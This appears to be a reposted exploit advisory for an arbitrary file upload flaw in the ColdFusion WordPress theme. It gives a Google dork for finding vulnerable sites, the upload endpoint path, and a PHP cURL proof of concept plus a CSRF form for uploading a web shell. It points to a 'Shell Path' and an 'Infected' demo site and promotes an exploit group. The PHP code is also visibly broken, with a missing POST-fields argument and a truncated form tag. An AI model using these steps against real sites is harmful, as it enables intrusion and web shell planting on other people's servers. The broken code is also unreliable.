WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability
#-Author: Smail Max / Bet0
#-Date: 10/31/2013
#- Vendor : themeforest. net
#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
#-Google Dork: inurl:wp-content/themes/ColdFusion
#- Tested on : Win7, Linux
#- Fixed in ??

Information of Bug : 

Bugtraq ID: 63523
Class: Input Validation Error
CVE: -
Remote: Yes
Local: No
Published: Nov 01 2013 12:00AM
Updated: Nov 01 2013 12:00AM
Credit: Bet0
When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 
The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With Remote Code :

$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
print "$postResult";

With CSRF :

action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">

If Succesfully (with CSRF) : 

Shell Path : Here

Site Demo (Infected) :

*Note :
Line, Spotify, Joox VIP Gratis : Here
Join Grup 3xploi7 : Here
Next Post »
Thanks for your comment